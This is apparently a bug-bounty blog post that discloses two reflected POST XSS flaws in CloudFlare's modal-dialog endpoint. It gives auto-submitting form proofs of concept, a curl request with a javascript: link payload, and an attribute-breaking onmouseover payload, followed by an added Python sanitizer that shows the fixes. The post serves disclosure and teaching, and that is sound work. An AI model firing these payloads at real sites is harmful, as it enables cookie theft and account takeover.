XSS in CloudFlare

#1 XSS

These are some duplicate vulnerabilities I found; I just thought of sharing them with you. Recently I found two POST XSS issues in CloudFlare and unfortunately I was not the first to report them.
I found the first issue in the “Confirm Key Generator” dialog box.

Let’s have a closer look at the URL.

It seems that an XMLHttpRequest object is used, and the server side accepts our POST request.

After playing around with the “content=” parameter, what I noticed was that it filters all HTML tags except

<b></b> <p></p> <A HREF="">

Well, as the <A HREF> tag is not filtered, we can easily execute JavaScript:

<A HREF="javascript:alert(document.cookie);">XSS</A>

So the proof of concept would be:

    <!-- POC by Osanda -->
    <form name="exploit" action="https://www.cloudflare.com/ajax/modal-dialog.html" method="POST">
      <input type="hidden" name="type" value="default" />
      <input type="hidden" name="content" value="Go to this link &lt;A HREF=&quot;javascript:prompt(&apos;XSS by Osanda&apos;);&quot;&gt;XSS&lt;/A&gt;" />
    </form>
    <!-- auto-submit the form as soon as the page loads -->
    <script>document.exploit.submit();</script>

We don’t need an authorized account to trigger the XSS since the issue is in “modal-dialog.html”. Here is the curl command:

curl -i -s -k -X 'POST' \
    -H 'User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0' -H 'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' -H 'X-Requested-With: XMLHttpRequest' -H 'Referer: https://www.cloudflare.com/my-account' \
    -b '__cfduid=dcfb031f1436b2c98ee75cfda0b313f9b1395243158470; __utma=1.1850105675.1399902759.1399910158.1400126593.4; __utmz=1.1399902759.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmb=; __utmc=1; vses2=9pvibldsqecve4b63ef9h13h75; __cf_effload=1' \
    --data-binary $'type=default&content=Go to this link <A HREF=\"javascript:prompt(\'XSS by Osanda\');\">XSS</A>' \
    'https://www.cloudflare.com/ajax/modal-dialog.html'

That is it Game Over 🙂

#2 XSS

The second XSS issue was in the “zoneupload” parameter in the “modal-dialog.html” file. In the previous scenario all the HTML tags were truncated, but here they are instead converted into special chars. How to bypass this one? 😉

Well, as usual, "'() are not filtered 🙂

ABC" onmouseover="prompt('XSS by Osanda') ""

Here is the proof of concept:

    <form action="https://www.cloudflare.com/ajax/modal-dialog.html" method="POST">
      <input type="hidden" name="type" value="zoneupload" />
      <input type="hidden" name="z" value="google.lk" />
      <input type="hidden" name="target" value="ABC&quot; onmouseover=&quot;prompt(&apos;XSS by Osanda&apos;) &quot;&quot;" />
      <input type="submit" value="Submit request" />
    </form>
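As an added example (my own code, not CloudFlare's), here is how a server could have handled both reflection points from this post. The first issue is an allow-list that keeps <a href> without checking the URL scheme, so safe_href() normalizes the value the way a browser does (entity decoding, control-character stripping) and then rejects anything that is not http, https, mailto or relative. The second issue is a value placed inside an attribute with tags encoded but quotes left alone, so escape_attr() encodes quotes as well and render_target_input() always puts the value in a quoted attribute. The function names, the allowed tag list and the allowed scheme list are my assumptions; the two inputs at the bottom are the payloads from the post.

```python
# Added example (not CloudFlare's code): the two output contexts that broke in
# this post, handled on the server side. Names and policy lists are assumed.
import html
import re
from typing import Optional
from urllib.parse import urlsplit

# Issue #1: a tag allow-list that keeps <a href> must also validate the URL
# scheme, otherwise a javascript: link passes straight through.
ALLOWED_TAGS = {"b", "p"}                        # kept, every attribute dropped
SAFE_SCHEMES = {"", "http", "https", "mailto"}   # "" = relative URL (assumed policy)

TAG_RE = re.compile(r"<(/?)([A-Za-z]+)([^>]*)>")
HREF_RE = re.compile(r"""href\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))""", re.I)


def safe_href(href: str) -> Optional[str]:
    """Return the href if its scheme is allowed, else None.

    Entity decoding and control-character stripping come first because the
    browser does both before it looks at the scheme.
    """
    cleaned = re.sub(r"[\x00-\x1f]", "", html.unescape(href)).strip()
    scheme = urlsplit(cleaned).scheme.lower()
    return cleaned if scheme in SAFE_SCHEMES else None


def escape_attr(value: str) -> str:
    """Issue #2: encode quotes as well as <, > and &, so the value cannot
    terminate the (always quoted) attribute it is placed in."""
    return html.escape(value, quote=True)


def _render_tag(m: re.Match) -> str:
    closing, name, attrs = m.group(1), m.group(2).lower(), m.group(3)
    if name in ALLOWED_TAGS:
        return f"<{closing}{name}>"
    if name == "a":
        if closing:
            return "</a>"
        hm = HREF_RE.search(attrs)
        href = next((g for g in hm.groups() if g is not None), "") if hm else ""
        safe = safe_href(href)
        # Unsafe or missing href: keep the link text, drop the attribute.
        return f'<a href="{escape_attr(safe)}">' if safe is not None else "<a>"
    return html.escape(m.group(0))               # any other tag becomes literal text


def sanitize_content(text: str) -> str:
    """Allow-list sanitizer for the 'content' field: text nodes are escaped,
    <b>/<p> survive bare, <a> survives only with a safe-scheme href."""
    out, pos = [], 0
    for m in TAG_RE.finditer(text):
        out.append(html.escape(text[pos:m.start()]))
        out.append(_render_tag(m))
        pos = m.end()
    out.append(html.escape(text[pos:]))
    return "".join(out)


def render_target_input(value: str) -> str:
    """How the 'target' value should be reflected: quoted attribute + escape_attr."""
    return f'<input type="hidden" name="target" value="{escape_attr(value)}" />'


if __name__ == "__main__":
    # The two payloads from the post, run through the fixed handlers.
    content = "Go to this link <A HREF=\"javascript:prompt('XSS by Osanda');\">XSS</A>"
    target = "ABC\" onmouseover=\"prompt('XSS by Osanda') \"\""
    print(sanitize_content(content))      # Go to this link <a>XSS</a>
    print(render_target_input(target))    # value="ABC&quot; onmouseover=&quot;..."
```

Running the file prints the two neutralized outputs: the link keeps its text but loses the javascript: href, and the reflected target value stays inside its attribute as inert text. The regex sanitizer is a minimal illustration of the allow-list idea; a real deployment would use a maintained sanitizer such as bleach, with the same rule that any surviving href is scheme-checked.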

So yeah here we go XSS again 😀

Bug hunting is not all about getting your name in halls of fame, receiving rewards or being the first to report. I just enjoy finding vulnerabilities and love to learn something new 🙂

